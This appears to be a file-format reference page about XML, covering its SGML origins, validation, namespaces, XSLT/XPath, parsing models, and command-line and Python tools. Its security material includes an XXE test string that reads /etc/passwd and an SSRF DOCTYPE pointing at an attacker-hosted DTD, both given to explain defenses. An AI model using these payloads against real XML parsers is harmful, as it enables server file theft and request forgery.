.XML Extensible Markup Language

XML encodes structured data as nested elements with attributes in human-readable, machine-parseable plain text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), RSS feeds, SOAP services, banking standards (ISO 20022), and ZATCA e-invoicing — even as JSON dominates web APIs.

File structure
Header schema
Records structured data
Text, W3C, 1998
Not convertible

Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.

Common questions

Why does my browser show 'This XML file does not appear to have any style information associated with it'?

This message appears when you open a raw XML file directly in a browser without an associated stylesheet. It is not an error — the browser simply has no instructions for visual rendering, so it displays the raw document tree instead. You commonly see this with XML sitemaps, RSS feeds, or API responses. The file itself is perfectly valid and well-formed.

What is the difference between XML and JSON?

XML uses matched opening and closing tags with attributes, supports namespaces, and offers formal schema validation through XSD. JSON uses a lighter curly-brace syntax that maps directly to programming language objects. JSON is typically 30 to 50 percent smaller for equivalent data and dominates modern web APIs, while XML remains essential in enterprise systems and regulated industries.

What is XXE injection and why is XML considered high-risk?

XXE injection exploits DOCTYPE entity declarations to read server files or trigger requests to internal network resources. The related Billion Laughs attack uses nested internal entity expansion to turn a few hundred bytes into gigabytes of memory consumption. Mitigation requires disabling external entity resolution and DTD processing in the parser configuration before handling untrusted input.
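One way to apply the "disable DTD processing" advice is to refuse any document that carries a DOCTYPE at all. The sketch below does that with Python's low-level expat binding; the function name parse_rejecting_doctype and the exception class DoctypeForbidden are hypothetical names chosen for illustration, and a maintained library such as defusedxml is the safer choice in production.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration (hypothetical name)."""


def parse_rejecting_doctype(data: bytes) -> bool:
    """Parse XML bytes, aborting as soon as a DOCTYPE declaration is seen."""
    parser = expat.ParserCreate()

    def forbid(name, system_id, public_id, has_internal_subset):
        # No DOCTYPE means no entity declarations, so neither XXE nor
        # entity-expansion payloads can be defined in the document.
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser.StartDoctypeDeclHandler = forbid
    parser.Parse(data, True)  # True marks this as the final chunk
    return True


safe = b"<order><item>ok</item></order>"
hostile = b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'

print(parse_rejecting_doctype(safe))
try:
    parse_rejecting_doctype(hostile)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Rejecting the DOCTYPE outright is stricter than disabling external entities only, which suits inputs such as API payloads that have no legitimate need for a DTD.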

Is XML still used or has JSON replaced it?

JSON replaced XML for most web APIs, but XML remains deeply embedded in infrastructure. Every DOCX and XLSX file contains XML internally. SVG graphics, RSS feeds, Android manifests, Maven builds, banking wire transfers (ISO 20022), healthcare data (HL7 FHIR, which supports XML alongside JSON), and Saudi ZATCA e-invoicing all rely on XML. The format lost surface visibility but is arguably more entrenched than ever.

What is the difference between well-formed and valid XML?

Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping of special characters. Valid XML is well-formed and additionally conforms to a schema (XSD, DTD, or RELAX NG) that defines permitted elements, attributes, and data types. A document can be well-formed without being valid.

How do I open and view an XML file?

Any web browser displays XML with a collapsible tree view. Text editors like VS Code, Notepad++, and Sublime Text provide syntax highlighting. For validation, use xmllint on the command line or an XML-aware editor like Oxygen XML Editor. XML is plain text, so even the simplest text editor can open it.

What is XSLT and how does it relate to XML?

XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet matches nodes in the source XML using template rules and outputs transformed content — HTML for web pages, a different XML vocabulary for system integration, or plain text for reports. XSLT is widely used in publishing workflows and enterprise data pipelines.

What makes .XML special

SGML lineage
Simplified from a 500-page ISO standard
XML is a direct descendant of SGML (ISO 8879, 1986), which powered defense and publishing but was too complex for the web. The W3C working group stripped SGML down to ten design principles. XML 1.0 shipped in February 1998.
Hidden empire
Lost the API war but powers everything underneath
JSON displaced XML for web APIs around 2012. But rename any .docx to .zip and you find XML inside. SVG is XML. RSS is XML. Android manifests, banking wire transfers (ISO 20022), and ZATCA e-invoicing all run on XML.
Frozen spec
Five editions from 1998 to 2008, then silence
XML 1.0 was published in 1998 and received its Fifth Edition in 2008. Since then, no revisions, no breaking changes, no deprecations. It is one of the most stable specifications in web technology history.
Billion Laughs
Under 1 KB of XML can consume about 3 GB of RAM
The Billion Laughs attack defines nested entities that expand exponentially. Each level references the previous ten times. A few hundred bytes of crafted XML overwhelms the parser with gigabytes of expanded text, crashing the server.

Descended from SGML

Before XML existed, enterprises structured documents with SGML (Standard Generalized Markup Language), an ISO standard published in 1986. SGML was powerful but notoriously complex — its full specification ran to over 500 pages, and building a conformant parser required deep expertise. When the web exploded in the mid-1990s, the W3C assembled a working group led by Jon Bosak of Sun Microsystems to create a language that kept SGML's core strengths — self-describing structure, validation, extensibility — while discarding its complexity. The result, published as a W3C Recommendation on February 10, 1998, was XML 1.0. The design committee articulated ten principles in the specification's introduction: XML shall be straightforwardly usable over the internet, support a wide variety of applications, be compatible with SGML, make it easy to write programs that process XML documents, keep optional features to an absolute minimum, be human-legible and reasonably clear, be prepared quickly, be formal and concise, be easy to create, and treat terseness as being of minimal importance. That last point explains XML's verbosity — a deliberate design choice favoring clarity over compactness.

Well-formedness versus validity

XML enforces two tiers of document correctness. A document is well-formed if it follows the syntax rules: every opening tag has a matching closing tag (or uses self-closing syntax), elements nest without overlapping, attribute values are quoted, and exactly one root element exists. Every conformant XML parser rejects documents that are not well-formed — there is no error-recovery mode equivalent to HTML's lenient parsing.
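The all-or-nothing behaviour described above can be observed with Python's built-in ElementTree parser. This is a minimal sketch; the helper name is_well_formed and the sample strings are illustrative assumptions, not part of any standard API.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if the parser accepts the text as well-formed XML."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        # Conformant parsers stop at the first well-formedness error.
        return False


good = "<order><item sku='A1'/></order>"
overlapping = "<b><i>text</b></i>"  # elements overlap instead of nesting
two_roots = "<a/><b/>"              # more than one root element

print(is_well_formed(good))         # True
print(is_well_formed(overlapping))  # False
print(is_well_formed(two_roots))    # False
```

This checks well-formedness only. Validity against an XSD, DTD, or RELAX NG schema needs a schema-aware tool such as xmllint or lxml.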

A document is valid if it is well-formed and also conforms to a schema that defines which elements, attributes, and data types are permitted. Three schema languages compete for this role. DTD (Document Type Definition) is the oldest, inherited from SGML, and defines element grammar using a compact notation. XML Schema (XSD), published by the W3C in 2001, adds typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules that DTDs cannot express. RELAX NG, developed by James Clark and Murata Makoto, offers a simpler, more readable alternative that many developers prefer for hand-authored schemas. Most XML encountered in practice is well-formed but never validated against a schema.

Namespaces and compound documents

When a single XML document combines vocabularies from different sources — an SVG graphic embedded in an XHTML page, or invoice line items alongside digital signature elements — element names from different vocabularies might collide. XML namespaces solve this by binding prefixes to URIs. A SOAP envelope might use the SOAP namespace for its structure while the payload uses a UBL namespace for invoice elements. The xmlns attribute declares these bindings, and prefixed element names like cbc:IssueDate make the vocabulary origin explicit. Namespaces are essential in enterprise XML but are one of the features that makes XML harder to work with than JSON, which has no namespace mechanism.
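As a rough illustration of prefix-to-URI binding, the sketch below parses a small two-vocabulary document with ElementTree. The document and both namespace URIs (urn:example:invoice, urn:example:basic) are made-up placeholders, not the real UBL identifiers.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the URIs are placeholders, not real UBL namespaces.
doc = """<inv:Invoice xmlns:inv="urn:example:invoice"
                      xmlns:cbc="urn:example:basic">
  <cbc:IssueDate>2024-01-15</cbc:IssueDate>
  <inv:Note>first</inv:Note>
</inv:Invoice>"""

root = ET.fromstring(doc)

# ElementTree stores names as {uri}local, so the prefix itself is irrelevant.
print(root.tag)  # {urn:example:invoice}Invoice

# A prefix map lets queries use short names; these prefixes are local to the
# query and need not match the ones used in the document.
ns = {"basic": "urn:example:basic"}
issue_date = root.find("basic:IssueDate", ns).text
print(issue_date)  # 2024-01-15
```

The query prefix here differs from the document's cbc prefix on purpose: only the URI identifies the vocabulary.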

Transformation and querying

XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet contains templates that match nodes in the source document and output transformed content — HTML for web display, a different XML vocabulary for system integration, or plain text for reporting. XSLT 1.0, published in 1999, remains widely deployed. XSLT 3.0, published in 2017, added streaming support for transforming documents larger than available memory.

XPath provides the query language that XSLT and other tools use to address nodes within an XML tree. An expression like //product[@category='electronics']/price selects price elements under product elements with a matching category attribute anywhere in the document. XPath 1.0 handles most practical queries. XQuery extends XPath into a full query language comparable to SQL for XML databases.
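The expression above can be tried with ElementTree, which implements a limited XPath subset. In this sketch the catalog data is invented for illustration, and the path starts with .// because ElementTree evaluates paths relative to an element rather than the document.

```python
import xml.etree.ElementTree as ET

# Invented sample data for illustration.
catalog = """<catalog>
  <product category="electronics"><name>Radio</name><price>25.00</price></product>
  <product category="books"><name>Atlas</name><price>40.00</price></product>
  <group>
    <product category="electronics"><name>Lamp</name><price>12.50</price></product>
  </group>
</catalog>"""

root = ET.fromstring(catalog)

# Matches price children of electronics products at any depth.
matches = root.findall(".//product[@category='electronics']/price")
prices = [element.text for element in matches]
print(prices)  # ['25.00', '12.50']
```

For full XPath 1.0 (functions, axes, unions) a tool such as xmlstarlet or lxml is needed; ElementTree covers only simple paths and predicates.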

DOM versus SAX parsing

Two fundamental parsing strategies exist for XML. DOM (Document Object Model) parsers read the entire document and build an in-memory tree structure that applications traverse and manipulate. This is convenient for small-to-medium documents but fails on large files because the tree consumes several times the document's file size in memory. SAX (Simple API for XML) parsers stream through the document, firing callbacks for start-element, end-element, and character-data events without building a tree. SAX is essential for processing multi-gigabyte XML feeds — financial transaction logs, scientific datasets, government data dumps — where DOM parsing would exhaust available memory. StAX (Streaming API for XML) provides a pull-based alternative where the application controls iteration.
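The callback style of SAX can be sketched with Python's xml.sax module. The handler below totals amount elements without ever building a tree; the class name AmountTotaler and the element names in the feed are assumptions made for the example.

```python
import xml.sax


class AmountTotaler(xml.sax.ContentHandler):
    """Sums the text of every <amount> element as the parser streams by."""

    def __init__(self):
        super().__init__()
        self.in_amount = False
        self.buffer = []
        self.total = 0.0
        self.count = 0

    def startElement(self, name, attrs):
        if name == "amount":
            self.in_amount = True
            self.buffer = []

    def characters(self, content):
        # Text may arrive in several chunks, so collect rather than assign.
        if self.in_amount:
            self.buffer.append(content)

    def endElement(self, name):
        if name == "amount":
            self.total += float("".join(self.buffer))
            self.count += 1
            self.in_amount = False


# Invented feed; a real one would be read from a file or socket.
feed = (b"<transactions>"
        b"<tx><amount>10.5</amount></tx>"
        b"<tx><amount>4.5</amount></tx>"
        b"</transactions>")

handler = AmountTotaler()
xml.sax.parseString(feed, handler)
print(handler.count, handler.total)  # 2 15.0
```

Memory use stays roughly constant regardless of feed size because only the current element's text is held, which is the trade-off against DOM's convenient random access.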

Lost the API war, powers everything underneath

XML dominated web data interchange through the early 2000s. SOAP web services wrapped XML payloads in XML envelopes with XML schemas and XML security. The complexity was staggering. When REST architecture gained traction and JSON offered a simpler, more compact alternative that mapped directly to JavaScript objects, developers migrated en masse. By 2012, JSON had overtaken XML for new web APIs. Today, roughly 78% of public APIs use JSON.

But XML never disappeared. It retreated from the visible surface layer into the infrastructure. Every DOCX, XLSX, and PPTX file is a ZIP archive containing XML documents — rename one to .zip and extract it to see the XML inside. SVG, the web's vector graphics format, is XML. RSS and Atom feeds are XML. Android layouts and manifests are XML. Maven pom.xml files build most Java projects. SAML authentication assertions are XML. Banking wire transfers use ISO 20022 XML messages. Healthcare data exchanges run on HL7 FHIR, which supports XML alongside JSON. Saudi Arabia's ZATCA e-invoicing mandate requires UBL 2.1 XML for all electronic invoices. The narrative that "XML is dead" confuses the loss of API dominance with disappearance. XML is less visible but arguably more entrenched than ever in the systems that actually move money, documents, and data.
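The "rename to .zip" observation can be reproduced in code. The sketch below builds a tiny ZIP archive in memory as a stand-in for an Office file and lists the XML parts it contains; the member contents are simplified placeholders and the helper name xml_members is hypothetical.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Stand-in archive: member names mimic an Office layout, contents are placeholders.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/document.xml",
                     "<document><body><p>Hello</p></body></document>")
    archive.writestr("docProps/core.xml", "<coreProperties/>")


def xml_members(zip_bytes: bytes) -> dict:
    """Map each .xml member of a ZIP archive to its root element tag."""
    roots = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith(".xml"):
                roots[name] = ET.fromstring(archive.read(name)).tag
    return roots


found = xml_members(buffer.getvalue())
print(found)
```

To inspect a real file, the bytes could be read from disk and passed to the same function, keeping in mind that archives from untrusted sources deserve the parser hardening discussed elsewhere on this page.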

Stability as a feature

XML 1.0 has had exactly five editions from its initial publication in 1998 to the Fifth Edition in 2008. Since then — nothing. No sixth edition, no breaking changes, no deprecations. This makes XML 1.0 one of the most stable specifications in the history of web technology. For archival and preservation contexts, where a format must remain readable for decades, this stability record is a significant advantage. The Library of Congress catalogs XML under FDD fdd000075 as a recognized preservation format.

.XML compared to alternatives

.XML vs .JSON
Criteria: Verbosity
JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. This makes JSON faster to parse and cheaper to transmit over networks.
Winner: JSON

.XML vs .JSON
Criteria: Schema validation
XSD provides typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules. JSON Schema is capable but less mature for multi-namespace enterprise document validation.
Winner: XML

.XML vs .HTML
Criteria: Error handling
XML parsers reject malformed documents immediately, with no error recovery. HTML parsers are lenient by design, silently fixing unclosed tags and nesting errors. XML's strictness catches data corruption early.
Winner: XML

.XML vs .YAML
Criteria: Enterprise adoption
XML dominates regulated industries: banking (ISO 20022), healthcare (HL7 FHIR), government (UBL invoicing), and legal (Akoma Ntoso). YAML is concentrated in DevOps and cloud-native tooling (Kubernetes, Docker Compose).
Winner: XML

Technical reference

MIME Type: application/xml
Developer: World Wide Web Consortium (W3C)
Year Introduced: 1998
Open Standard: Yes

Binary Structure

XML is a text format with no binary structure or magic bytes. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying the version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or defining inline entities. The document body consists of a single root element containing nested child elements delimited by matched start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding; UTF-16 is also required for conformant parsers. Files may begin with a UTF-8 BOM (EF BB BF) before the declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. PRONOM identifies XML as fmt/101 using the <?xml declaration as the primary signature.
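A simple signature check along the lines described above might look like the following sketch. It only handles UTF-8 or ASCII-compatible input (UTF-16 documents would need their own BOM handling), and the function name sniff_xml is a hypothetical choice.

```python
import codecs


def sniff_xml(data: bytes) -> dict:
    """Report whether bytes start with a UTF-8 BOM and an XML declaration.

    Assumes UTF-8 or another ASCII-compatible encoding; UTF-16 is not handled.
    """
    has_bom = data.startswith(codecs.BOM_UTF8)  # EF BB BF
    body = data[len(codecs.BOM_UTF8):] if has_bom else data
    return {
        "utf8_bom": has_bom,
        # The declaration is optional, so False does not mean "not XML".
        "has_declaration": body.startswith(b"<?xml"),
    }


with_bom = codecs.BOM_UTF8 + b'<?xml version="1.0" encoding="UTF-8"?><a/>'
bare = b"<a/>"

print(sniff_xml(with_bom))  # {'utf8_bom': True, 'has_declaration': True}
print(sniff_xml(bare))      # {'utf8_bom': False, 'has_declaration': False}
```

Because the declaration is optional, a check like this can confirm likely XML but cannot rule it out; a full parse is the only reliable test.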

1986: SGML (Standard Generalized Markup Language) published as ISO 8879, XML's direct ancestor, designed for structured document markup in publishing and defense industries
1998: XML 1.0 published as a W3C Recommendation on February 10, designed by Jon Bosak's working group as a simplified subset of SGML for the web
1999: XSLT 1.0 and XPath 1.0 published by the W3C, enabling declarative transformation and querying of XML documents
2001: XML Schema (XSD) 1.0 published, a typed validation language replacing DTDs for complex enterprise schema enforcement
2003: SOAP 1.2 becomes a W3C Recommendation, establishing XML as the dominant web services protocol; the peak of the XML-over-HTTP era
2008: XML 1.0 Fifth Edition published, the final revision, relaxing element name restrictions. Also: Office Open XML (OOXML) becomes ISO/IEC 29500
2012: JSON overtakes XML for new web APIs as REST displaces SOAP. Douglas Crockford's RFC 4627 and browser-native JSON.parse() accelerate adoption
2017: XSLT 3.0 published with streaming support, enabling transformation of documents larger than available memory without full DOM loading

Validate XML well-formedness with xmllint
xmllint --noout input.xml

Parses the file and reports well-formedness errors. The --noout flag suppresses document output on success, producing output only on error. Exit code 0 means well-formed. Part of libxml2, pre-installed on macOS and most Linux distributions.

Validate XML against an XSD schema
xmllint --noout --schema schema.xsd input.xml

Validates the XML document against the specified XSD schema file. Reports both well-formedness and schema validation errors with line numbers. Useful for verifying invoice XML against UBL or ISO 20022 schemas.

Pretty-print and reformat XML
xmllint --format input.xml > formatted.xml

Reformats XML with consistent indentation for readability. Useful for making minified XML from APIs or machine-generated output human-readable. Also implicitly checks well-formedness.

Extract values with XPath using xmlstarlet
xmlstarlet sel -t -v '//product/name/text()' input.xml

Evaluates an XPath expression against the document and prints matching text. xmlstarlet supports full XPath 1.0 syntax. Install with apt install xmlstarlet (Debian/Ubuntu) or brew install xmlstarlet (macOS).

Parse XML and extract root tag with Python
python3 -c "import xml.etree.ElementTree as ET; tree = ET.parse('doc.xml'); print(tree.getroot().tag)"

Uses Python's built-in ElementTree parser to read the XML and print the root element tag. Available without installing any packages. Note: Python's standard-library XML modules are not hardened against maliciously constructed input such as entity-expansion attacks; use defusedxml for untrusted input.

Security risk: HIGH

Attack Vectors

  • XXE (XML External Entity) injection: DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers. OWASP listed XXE as its own category (A4) in the 2017 Top 10 and folded it into Security Misconfiguration in the 2021 edition.
  • Billion Laughs denial of service — exponentially expanding nested entity definitions (each referencing the previous ten times) consume gigabytes of RAM from a few hundred bytes of XML, crashing the parser and potentially the entire server.
  • SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery behind firewalls.
  • XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and unauthorized data extraction from XML datastores, analogous to SQL injection for relational databases.
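The exponential growth behind Billion Laughs is easy to check with arithmetic. The sketch below assumes the commonly cited form of the payload: a 3-byte base string and nine further entity levels, each referencing the previous level ten times. The function name expanded_size is illustrative.

```python
def expanded_size(base_bytes: int, fanout: int, levels: int) -> int:
    """Bytes produced when each level references the previous one `fanout` times."""
    return base_bytes * fanout ** levels


# Assumed parameters: "lol" (3 bytes), ten references per level, nine levels.
size = expanded_size(base_bytes=3, fanout=10, levels=9)
print(size)                  # 3000000000
print(size / 10**9, "GB")    # 3.0 GB
```

Each extra level multiplies the output by ten while adding only one short line to the payload, which is why limits on entity expansion depth or total expanded size are effective defenses.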

Mitigation: FileDex processes XML files entirely in the browser using the native DOMParser API. No external entity resolution, no DTD fetching, no server-side parsing. The browser's sandboxed context prevents filesystem access and network requests from parsed entities.

xmllint (tool): Command-line XML validator and formatter from libxml2, pre-installed on macOS and most Linux distributions
xmlstarlet (tool): Command-line XML toolkit for querying (XPath), editing, validating, and transforming XML documents
lxml (library): Python binding for libxml2/libxslt providing fast XML parsing, XPath queries, XSLT transforms, and schema validation
Saxon (tool): XSLT 3.0 and XQuery 3.1 processor, the reference implementation for advanced XML transformations with streaming support
fast-xml-parser (library): High-performance XML to JSON/JS-object parser for Node.js with no native dependencies
Professional XML authoring environment with visual XSD designers, XSLT debugging, and support for DITA, DocBook, and XHTML